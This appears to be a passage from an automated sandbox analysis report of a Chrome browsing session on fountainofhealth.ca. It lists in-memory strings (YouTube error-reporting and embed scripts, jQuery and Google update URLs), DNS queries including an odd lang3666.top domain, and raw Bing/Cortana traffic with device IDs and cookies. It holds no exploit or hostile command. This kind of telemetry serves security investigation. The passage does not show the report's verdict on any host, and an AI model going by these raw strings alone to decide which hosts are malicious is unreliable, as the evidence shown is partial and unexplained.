(Youtube)
                                  Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}P$4c943c22-5c79-4450-af80-a88a7cf5104bf5104b equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}application/json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}D equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}:false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getTabUrl"}ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}iM equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: |https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}ne":true,"dynamic":fale} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} B equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: global trafficDNS traffic detected: DNS query: fountainofhealth.ca
                                  Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
                                  Source: global trafficDNS traffic detected: DNS query: islonline.org
                                  Source: global trafficDNS traffic detected: DNS query: lang3666.top
                                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                                  Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                                  Source: global trafficDNS traffic detected: DNS query: i.ytimg.com
                                  Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
                                  Source: global trafficDNS traffic detected: DNS query: static.doubleclick.net
                                  Source: global trafficDNS traffic detected: DNS query: yt3.ggpht.com
                                  Source: global trafficDNS traffic detected: DNS query: play.google.com
                                  Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
                                  Source: global trafficDNS traffic detected: DNS query: windomstatetheater.com
                                  Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
                                  Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
                                  Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
                                  Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
                                  Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0content-type: application/jsoncache-control: privatevary: Accept-Encodingx-eventid: 682f3d25affc4384bc23e13ac651d3fbuseragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=x-xss-protection: 0p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"date: Thu, 22 May 2025 15:05:09 GMTset-cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 16-Jun-2026 15:05:09 GMT; path=/; HttpOnlyalt-svc: h3=":443"; ma=93600x-cdn-traceid: 0.07d854b8.1747926309.1fcaf5cf
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0content-type: application/jsoncache-control: privatevary: Accept-Encodingx-eventid: 682f3d2628224d83802d030cc0b39d1euseragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=x-xss-protection: 0p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"date: Thu, 22 May 2025 15:05:10 GMTset-cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 16-Jun-2026 15:05:10 GMT; path=/; HttpOnlyalt-svc: h3=":443"; ma=93600x-cdn-traceid: 0.07d854b8.1747926310.1fcaf789
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0content-type: application/jsoncache-control: privatevary: Accept-Encodingx-eventid: 682f3d26690d403fa3e82e2275b826efuseragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=x-xss-protection: 0p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"date: Thu, 22 May 2025 15:05:10 GMTset-cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 16-Jun-2026 15:05:10 GMT; path=/; HttpOnlyalt-svc: h3=":443"; ma=93600x-cdn-traceid: 0.07d854b8.1747926310.1fcaf996
                                  Source: chrome.exe, 00000000.00000003.2328954929.000028EC03360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.jquery.com/prop/
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabjdbkj
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdgajlph
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dl.google.com/release2/chrome_component/lnu3li27zsanbe2hcsfjuvm5fq_1.0.7.1744928549/laoigpbln
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.jquery.com/Tutorials:Introducing_$(document).ready()
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgzb5szf7x3so2hvkfx32p7bbuq_9805/hfnkpim
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/aevtvjsxpcrwhjvp5w32fej6zq_9.56.0/gcmjkmg
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fpm7b3lyymiazxgd7zkf5fvmra_2024.10.17.0/p
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pk
                                  Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313183913.000028EC04904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fountainofhealth.ca/
                                  Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fountainofhealth.ca//
                                  Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://fountainofhealth.ca/Home
                                  Source: chrome.exe, 00000000.00000002.2468126281.000028EC022E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jquery.malsup.com/cycle/
                                  Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315094018.000028EC046E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322945815.000028EC06D60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jquery.malsup.com/form/#file-upload.
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jquery.malsup.com/license.html
                                  Source: chrome.exe, 00000000.00000003.2314796716.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315260406.000028EC05C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314766103.000028EC038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315094018.000028EC046E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315197894.000028EC04024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320493460.000028EC029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320004983.000028EC074E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490227652.000028EC03F54000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315228381.000028EC03BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jquery.org/license
                                  Source: chrome.exe, 00000000.00000003.2314796716.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315260406.000028EC05C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314766103.000028EC038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315094018.000028EC046E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315197894.000028EC04024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320493460.000028EC029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320004983.000028EC074E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315228381.000028EC03BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jqueryui.com
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS0
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com/da2oa9
                                  Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330812480.000028EC05D3B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1950
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabj
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdga
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eei
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindgg
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkehg
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pkomkdjpmj
                                  Source: chrome.exe, 00000000.00000002.2503232175.000028EC07364000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/commands.html#the-di
                                  Source: chrome.exe, 00000000.00000002.2503232175.000028EC07364000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/commands.html#the-dilog-ele
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/watch?v
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/drm/2012/10/10
